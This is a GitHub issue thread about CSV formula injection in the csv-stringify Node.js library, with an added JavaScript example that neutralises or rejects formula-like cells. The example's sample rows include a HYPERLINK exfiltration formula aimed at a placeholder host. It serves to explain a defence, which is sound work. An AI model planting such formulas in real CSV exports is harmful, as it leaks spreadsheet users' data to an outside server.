adaltas / node-csv-stringify

CSV stringifier implementing the Node.js `stream.Transform` API
https://csv.js.org/stringify/

SECURITY: CSV formula injection #126

Closed ghost closed 3 years ago

ghost commented 3 years ago

See https://owasp.org/www-community/attacks/CSV_Injection for details.

But this is basically how https://gitlab.com/lucaapp was used in Germany to extract sensitive data. See https://twitter.com/mame82/status/1397425075654168576 for the original report.

It was checked that this library is not doing any kind of mitigation (neither encoding these kinds of cells as strings nor making sure that these kinds of cells don't exist).
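To make the two mitigations named in this comment concrete, the following is an added, self-contained example (not code from csv-stringify or from either participant). It implements the OWASP CSV Injection guidance in plain JavaScript: cells beginning with `=`, `+`, `-`, `@`, tab or carriage return are either neutralised with a leading single quote (`escape` mode) or cause the write to be refused (`reject` mode), and RFC 4180 quoting is applied afterwards so an embedded `"` or `,` cannot end the cell early. The sample rows, the `example.invalid` host and the function names are constructed for illustration.

```javascript
'use strict';

// Leading characters that Excel, LibreOffice Calc, Google Sheets and similar
// evaluate as a formula. OWASP lists '=', '+', '-' and '@'; tab and carriage
// return are included because some importers strip them and then evaluate
// the remainder.
const FORMULA_PREFIX = /^[=+\-@\t\r]/;

function isFormulaLike(value) {
  return typeof value === 'string' && FORMULA_PREFIX.test(value);
}

// OWASP mitigation 1: prefix a single quote so the spreadsheet reads the
// cell as text. Trade-off: not every consumer strips that quote again.
function neutralizeCell(value) {
  return isFormulaLike(value) ? "'" + value : value;
}

// RFC 4180 quoting: wrap cells that contain the delimiter, a double quote or
// a line break, doubling embedded double quotes. Done after neutralisation so
// a crafted cell cannot terminate the quoted field and start a fresh formula.
function quoteCell(value) {
  const s = value == null ? '' : String(value);
  return /[",\r\n]/.test(s) ? '"' + s.replace(/"/g, '""') + '"' : s;
}

// mode 'escape': neutralise formula-like cells (OWASP mitigation 1)
// mode 'reject': refuse to produce the file at all (OWASP mitigation 2,
//                "make sure these cells don't exist")
// mode 'none'  : a generic stringifier with no mitigation, for comparison
function toCsv(rows, { mode = 'escape' } = {}) {
  const lines = rows.map((row, r) =>
    row.map((cell, c) => {
      if (mode === 'reject' && isFormulaLike(cell)) {
        throw new Error(`formula-like cell at row ${r}, column ${c}`);
      }
      return quoteCell(mode === 'escape' ? neutralizeCell(cell) : cell);
    }).join(','));
  return lines.join('\r\n') + '\r\n';
}

// Constructed sample input: the "name" column is attacker-controlled. The
// payload is a textbook HYPERLINK exfiltration formula, not one taken from
// any real incident. Note the legitimate phone number starting with '+'.
const SAMPLE_ROWS = [
  ['name', 'phone'],
  ['Alice', '+49 30 000000'],
  ['=HYPERLINK("http://example.invalid/?c="&A1,"click")', '12345'],
];

// Stand-alone demonstration of the three modes.
console.log('--- none (unmitigated) ---\n' + toCsv(SAMPLE_ROWS, { mode: 'none' }));
console.log('--- escape ---\n' + toCsv(SAMPLE_ROWS, { mode: 'escape' }));
try {
  toCsv(SAMPLE_ROWS, { mode: 'reject' });
} catch (e) {
  console.log('--- reject ---\n' + e.message);
}
```

Running this shows the caveat behind the "generic CSV versus Excel-specific" disagreement in this thread: the phone number `+49 30 000000` is flagged exactly like the `HYPERLINK` payload, so `escape` mode rewrites it to `'+49 30 000000` and `reject` mode refuses the whole file on row 1 before it ever reaches the malicious row. Whether that is acceptable depends on the consumer, which is why an opt-in option rather than unconditional rewriting is the usual shape for a library-level fix.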

wdavidw commented 3 years ago

Could you provide an example replicating the issue and describe the solution you propose? This library is about creating generic CSV files, not preparing CSV files for a specific usage like Excel. For those usages, I am not against providing an option to prevent certain data from matching a set of rules.

ghost commented 3 years ago

> Could you provide an example replicating the issue

Please check OWASP for more information about the details.

> describe the solution you propose.

You are the developer and have to provide the solution. But you can check OWASP for some examples.

> This library is about creating generic CSV files, not preparing CSV file for a specific usage like for Excel

There are other tools which parse it the same way (LibreOffice, Google Docs, Collabora, ...).

wdavidw commented 3 years ago

> You are the developer and have to provide the solution.

If I get paid for it. Otherwise, feel free to contribute a pull request.